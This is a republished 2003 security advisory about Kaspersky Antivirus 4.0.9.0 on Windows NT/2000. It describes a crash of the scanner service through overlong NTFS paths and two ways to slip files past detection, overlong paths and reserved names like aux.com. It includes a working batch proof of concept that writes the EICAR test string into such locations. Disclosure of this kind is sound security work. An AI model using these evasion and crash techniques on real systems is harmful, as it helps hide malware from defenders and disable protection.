Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Kaspersky Antivirus DoS

Kaspersky Antivirus DoS

by Nikola Strahija on February 11th, 2003 Few vulnerabilities were identified. Most serious allows user to crash antiviral server remotely (write access to any directory on remote server is required).


Title: Kaspersky Antivirus DoS
Affected: Kaspersky Antivirus 4.0.9.0
(Server and Workstation version on
Windows NT 4.0 and Windows 2000).
Author: ZARAZA <[email protected]>
Vendor: Kaspersky Lab
Date: January, 30 2003
Risk: Average
Exploitable: Yes
Remote: Yes (for server versions)
Vendor Notified: January, 30 2003

I. Introduction:

Kaspersky Antivirus (KAV) is a family of antiviral products.

II. Vulnerability:

Few vulnerabilities were identified. Most serious allows user to crash
antiviral server remotely (write access to any directory on remote
server is required).

1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection

III. Details:

1. Long path crash

NTFS file system allows to create paths of almost unlimited length. But
Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \? prefix may be used to
filename. This is documented feature of Windows API. Paths longer than
256 characters will cause KAV monitor service to crash or hang with 100%
CPU usage. Possibility of code execution is not researched.

2. Long path prevents malware from detection

Long path will also prevent malware from detection by antiviral scanner.


3. Special name prevents malware from detection

It's possible to create NTFS file with name like aux.vbs or aux.com.
Malware in this file will not be detected.

IV. Exploit:

This .bat file demonstrates vulnerability.

1,2 Long path crash & Long path prevents malware from detection

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \?c:%A%
mkdir \?c:%A%%A%
mkdir \?c:%A%%A%%A%
mkdir \?c:%A%%A%%A%%A%
mkdir \?c:%A%%A%%A%%A%%A%
mkdir \?c:%A%%A%%A%%A%%A%%A%
echo X5O!P%%@AP[4PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\?c:%A%%A%%A%%A%%A%%A%%A%.com

3. Special name prevents malware from detection

echo X5O!P%%@AP[4PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\?c:aux.com


V. Vendor

No response from vendor.

--
http://www.security.nnov.ru


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »